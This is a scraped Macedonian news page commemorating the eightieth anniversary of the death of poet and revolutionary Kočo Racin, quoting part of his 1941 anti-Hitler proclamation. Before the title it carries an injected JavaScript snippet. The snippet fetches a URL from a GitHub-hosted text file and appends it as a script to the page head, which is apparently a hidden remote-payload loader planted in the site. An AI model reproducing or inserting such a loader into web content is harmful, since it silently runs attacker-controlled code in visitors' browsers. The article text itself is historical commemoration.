;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Осумдесет години од смртта на црвениот поет - К.С Рацин - слава му! - Антропол
АктуелноЛокално

Осумдесет години од смртта на црвениот поет – К.С Рацин – слава му!

На својата фејсбук страница Левичарскиот институт Рацин во чест на Рацин објави:

На денешен ден, 13 јуни 1943 година, на Лопушник, кичевско, загинал Кочо Рацин, револуционер, марксистички теоретичар и еден од основоположниците на македонската современа книжевност.

Рацин, како еден од најистакнатите интелектуалци што ги дала Македонија во периодот помеѓу двете светски војни, но и воопшто, беше многу повеќе од само наш најдобар поет – неговата активност како истакнат работнички и комунистички деец обично се потиснува во втор план, но сликата на Рацин без овој елемент е некомплетна.

Грнчар, уредник на месечниот весник „Искра“, член на КПЈ и СКОЈ, партизан во одредот „Кораб“, дописник на весникот „Организовани радник“, орган на Независните работнички синдикати на Југославија, тоа е само дел од тоа што бил Кочо Рацин.

Во оваа прилика, ви пренесуваме дел од Прогласот на Рацин до целиот македонски народ, напишан есента 1941 година. Подолу во коментар ќе може да го најдете споменатиот Проглас во интегрална форма:

„Хитлеровиот вазал, Борис Последни, си ја поврзале својата судбина со Хитлера. Нимната штампа, нимното радио, нимните продадени човеци – сите сега у еден глас викајат: спасението на Болгарија и Македонија е у победата на Хитлера. Ако не поведи Хитлер, Англија ке не уништожи, а вас македонците србите ке ве исколат. НО СИЧКО ТОВА НЕ Е ВЕРНО а стара маска на подлец и униец! Тешко и горко за ним – они нема што да берат гајле за судбината на нашиот народ, они – што ни мислат ново пеивековно робство под крвавата хитлерова чизма.

Македонскиот народ НЕМА ШТО ДА СЕ ПЛАШИ ОД СРБИТЕ: храбрите српски синови, кои денеска се борат по легендардните шумадијски шуми и планини, против бандите на кучето Хитлер и неговото вазално великосрпско правителство – најздрава се гарантија оти нема да се врати старата српска чизма. Со српските шовинисти, со болгарските шовинисти, со нифната политика на поделба на Македонија – се свршуе веке! Смртта на нифниот господар, подлецот Хитлер, е и нифна смрт! Над целиот тој џган и пепел и гар, над гробот на сите балкански кавги ке воскресне УНИЈАТА НА СЛОБОДНИТЕ БАЛКАНСКИ НАРОДИ, и СЛОБОДНА, НЕЗАВИСНА МАКЕДОНИЈА!

Македонци!

НАЈГОЛЕМИОТ НЕПРИЈАТЕЛ НА НАШАТА СЛОБОДА е непријателот и поробителот на сите европејски народи – КУЧЕТО ХИТЛЕР!

НАШЕТО МЕСТО Е ДЕНЕСКА НА СТРАНАТА НА ТИЈА НАРОДИ, против Хитлера и неговите болгарски вазали!

ДА ЖИВЕЕ СВЕТСКАТА БОРБА ПРОТИВ КУЧЕТО ХИТЛЕР!

СЛАВА НА ЦРВЕНАТА АРМИЈА И ПАДНАЛИТЕ СОВЈЕТСКИ БОРЦИ!

ДОЛЕ БОЛГАРСКИТЕ ВАЗАЛИ НА ХИТЛЕР!

ЗА СЛОБОДА, ЗА НАРОДНИ ПРАВА, ЗА ПОАРЕН И ПО СЛОБОДЕН ЖИВОТ!

ЗА НЕЗАВИСНА МАКЕДОНИЈА, ЗА УНИЈА НА СИТЕ БАЛКАНСКИ НАРОДИ!